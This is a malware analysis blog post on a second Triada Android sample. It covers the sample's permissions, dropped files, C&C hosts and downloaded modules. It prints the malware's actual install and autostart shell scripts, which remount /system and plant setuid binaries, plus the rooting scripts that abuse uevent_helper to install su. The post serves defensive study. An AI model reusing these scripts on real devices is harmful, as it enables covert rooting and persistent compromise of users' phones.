Tuesday, March 22, 2016

Triada malware: hitting the android core system (part II)

Following my previous post I took a look to another sample from this same malware family. 






This second sample was reported the same day I performed the analysis and it has quite significative differences with very interesting points.

The first difference is that the malicious code is inside an application which shows in the list of applications, opposite to the previous one which was 'hidden'. Moreover, the size of the APK is significantly bigger (1.5MB vs 100KB)

.

The application has a strange name: anefjlb.cdioclg.nfffpjj.jidondl.gkibaap.lmkgcmk and it requests a bunch of permissions, if compared to the sample analysed in previous post 


 <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="droid.permission.INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.CLEAR_APP_CACHE" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <permission android:name="android.permission.ACCESS_DOWNLOAD_MANAGER" />
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
    <uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.intent.action.BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <permission android:name="android.permission.BAIDU_LOCATION_SERVICE" />
    <uses-permission android:name="android.permission.BAIDU_LOCATION_SERVICE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_GPS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW" />
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />
    <uses-permission android:name="READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_MMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.GET_PACKAGE_SIZE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.READ_LOGS" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.ACCESS_MTK_MMHW" />
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.MOUT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.BROADCAST_STICKY" />
    <uses-permission android:name="com.android.alarm.permission.SET_ALARM" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />

But the interesting part comes when analysing the behaviour of the malicious APK. 
I managed to capture some of the temporal files used by the application to become persistent in the system. There are several binaries and scripts:


busybox:             gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
cd:                  very short file (no magic)
configopb:           ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), stripped
core:                Zip archive data, at least v2.0 to extract
install:             a /system/bin/sh script text executable
install-recovery.sh: a /system/bin/sh script text executable
librgsdk.so:         ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped
mksh:                gzip compressed data, from Unix, last modified: Tue Dec 10 09:34:32 2013
recovery:            gzip compressed data, was "install-recovery.sh", from Unix, last modified: Wed Jun 11 11:59:16 2014
sr:                  data

One of the files is Busybox, which provides many Linux/Unix tools in a singe binary.   Really interesting :)

The install script contains the following set of commands


#!/system/bin/sh
/system/bin/mount -o remount,rw /system
mount -o remount,rw /system
chmod 777 /system/etc
rm -f /system/etc/install-recovery.sh
cat /data/local/tmp/install-recovery.sh > /system/etc/install-recovery.sh
chown 0.0 /system/etc/install-recovery.sh
chown 0:0 /system/etc/install-recovery.sh
chmod 0755 /system/etc/install-recovery.sh
chmod 755 /system/etc
chmod 777 /system/bin
rm -f /system/bin/conbb
cat /data/local/tmp/configopb > /system/bin/conbb
chown 0.0 /system/bin/conbb
chown 0:0 /system/bin/conbb
chmod 6755 /system/bin/conbb
chmod 755 /system/bin
chmod 777 /system/xbin
rm -f /system/xbin/conbb
cat /data/local/tmp/configopb > /system/xbin/conbb
chown 0.0 /system/xbin/conbb
chown 0:0 /system/xbin/conbb
chmod 6755 /system/xbin/conbb
chmod 755 /system/xbin
mount -o remount,ro /system
/system/xbin/conbb ac32dorbdq

Basically the script is remounting the filesystem in order to be able to copy some script "install-recovery.sh" and  some binaries "conbb" and "configopb". This is done to keep them persistently in the filesystem.

The install-recovery.sh script contains the following:


#!/system/bin/sh
/system/xbin/conbb ac32dorbdq &
/system/bin/configopb ac32dorbdq &


The file 'mksh' is a compressed file which contains a set of scripts which reference to an APK named com.baidu.easyroot, which it is a rooter. The content of the scrips is the following:


cat baiduscript-1

#!/system/bin/sh
'set' '-e';'exec' >>'/data/data/com.baidu.easyroot/files/mksh/baiduscript-4' 2>&'1';PATH='/system/bin';'mv' '/data/property' '/data/property.1384944281';'set' '+e';('set' '-e';'mkdir' '/data/property';'set' '+e';('set' '-e';'ln' '-s' '/sys/kernel/uevent_helper' '/data/property/.temp';'setprop' 'persist.sys.impactor' '/data/data/com.baidu.easyroot/files/mksh/baiduscript-2';
    if ! rm /data/property/persist.sys.impactor 2>/dev/null; then
        sleep 1
        rm /data/property/persist.sys.impactor
    fi;'ln' '-s' '/sys/bus/hid/uevent' '/data/property/.temp';'setprop' 'persist.sys.impactor' 'add';
    if ! rm /data/property/persist.sys.impactor 2>/dev/null; then
        sleep 1
        rm /data/property/persist.sys.impactor
    fi);e=$?;'rm' '-r' '/data/property';'set' '-e';(exit $e));e=$?;'mv' '/data/property.1384944281' '/data/property';'set' '-e';(exit $e)



cat baiduscript-2

#!/system/bin/sh
'set' '-e';'exec' >>'/data/data/com.baidu.easyroot/files/mksh/baiduscript-4' 2>&'1';PATH='/system/bin';'echo' '' >'/sys/kernel/uevent_helper';'set' '+e';('set' '-e');e=$?;'echo' >'/data/data/com.baidu.easyroot/files/mksh/baiduscript-5';'set' '-e';(exit $e);'/data/data/com.baidu.easyroot/files/mksh/baiduscript-3'




cat baiduscript-2

#!/system/bin/sh
'set' '-e';'exec' >>'/data/data/com.baidu.easyroot/files/mksh/baiduscript-4' 2>&'1';PATH='/system/bin';'mount' '-o' 'remount,rw' '' '/system';'set' '+e';('set' '-e';'set' '+e';('set' '-e');e=$?;'mkdir' '/system/xbin' 2>'/dev/null';'set' '-e';(exit $e);'cat' '/data/data/com.baidu.easyroot/files/su' >'/system/xbin/su';'chmod' '6755' '/system/xbin/su';'chmod' '6755' '/system/app/BaiduRoot.apk');e=$?;'mount' '-o' 'remount,ro' '' '/system' 2>'/dev/null';'set' '-e';(exit $e);'set' '+e';('set' '-e');e=$?;'echo' >'/data/data/com.baidu.easyroot/files/mksh/baiduscript-6';'set' '-e';(exit $e)


The last interesting file 'core' is an APK already reported in VirusTotal. 





The mentioned APK is almost the same than  b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8 which Is the one I analysed in my previous post


In terms of traffic, the behavior is very similar to the previous sample. There are several connection to different C&C hosts:

ph3.elsyzsmc.com:8080, cr3.rurimeter.com:8080, ph1.rurimeter.com:8080, ph2.elsyzsmc.com:8080, ph1.elsyzsmc.com:8080. Those domains resolve to the following IP:

ph3.elsyzsmc.com 103.15.217.165
ph1.rurimeter.com 103.15.217.165
ph2.elsyzsmc.com 103.15.217.165
ph1.elsyzsmc.com 103.15.217.165
cr3.rurimeter.com 103.6.223.226

Note that host 103.6.223.226 also is linked to ph3.xiaoyisy.com and ph4.xiaoyisy.com, used by the sample b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8


 

Moreover, some additional modules are gathered from xla.poticlas.com, which it is exactly the same used by sample  b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8




This time the modules pulled are different:


MD5 (2020.zip) = 42d6f191f1d7daf1e6204aa5823ef563
MD5 (2027.zip) = 31465b67f57efe3930dd9ebb7da3bc88
MD5 (2030.zip) = b1fccf033a589adf862d9c3b339f8efc
MD5 (2031.zip) = 25d93aba3e276ebd802814a3cd1aa735
MD5 (2044.zip) = b69876c4925e19d418564a5ec74f8554



Im summary, the points to highlight from this sample are:  its root capabilities through some scripts and rooting APK. Moreover, it is able to use / install some additional tools like Busybox, which provides some additional Linux  / Unix functionalities. The way it becomes persistent in the system, remounting the filesystem in order to be able to copy some scripts and binary files makes very difficult to clean it up. 
The communication with the C&C and the installation of additional modules is similar to sample b2c2f74772c5057451668f144191f8d7191e5f98dbc6b6533698af5aa2baabc8 from the same malware family.